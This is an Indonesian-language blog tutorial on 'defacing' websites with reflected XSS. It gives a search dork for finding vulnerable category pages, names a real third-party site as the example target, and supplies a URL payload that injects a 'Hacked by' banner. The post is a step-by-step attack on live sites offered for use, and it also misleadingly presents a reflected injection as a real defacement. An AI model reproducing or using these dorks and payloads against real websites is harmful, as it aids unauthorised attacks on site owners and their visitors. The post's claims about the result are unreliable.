![+=x[ KRESS|DaiLy ]x=+](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjeExTKPR2LK7Qjb_fYUZC6lgi4sKLRf55KHJEdF-B5ky7HtJzz96NKMccHcN6GGc_5cF7aXdDinn7D_a6t1mpUftKDp1xx5CPn1vQay7DhZUL-t6bJVaaOJidRl7-jQidl15Dte9SJ/s1600/awe.png)
Sebelumnya udah pada tau belum apa itu XSS Vulnerability? XSS Vulnerability adalah suatu cara memasukan code/script HTML kedalam suatu website dan dijalankan melalui browser di client. Ok deh, Langsung aja kita bahas bersama Cara Deface Website Menggunakan Teknik XSS Vulnerability ini !
1). Pertama, Masukan Dorknya :
inurl:"/showcatrows.php?CategoryID="
2). Kalo sudah, Pilih salah satu web yang akan kita deface.
Contoh : saya pakai web ini http://www.examsolutions.co.uk/...?CategoryID=13
3). Jika sudah masuk ke halaman web target, kita modifikasi sedikit URL web target dengan menambahkan tanda " dan > setelah angka, tepatnya pada akhir URL. Lalu tambahkan kode HTML deface kita.
Contoh : http://www.examsolutions.co.uk/...?CategoryID=13"><marquee><h1>Hacked by Cirebon-Cyber4rt</h1></marquee>
4). Kemudian tekan Enter.
5). Selesai, Website sudah berhasil kita deface :D
Triknya memang cukup simpel, dimana kita memanfaatkan celah keamanan pada XSS sebuah website dengan memasukan sebuah code/script HTML.
Posting Komentar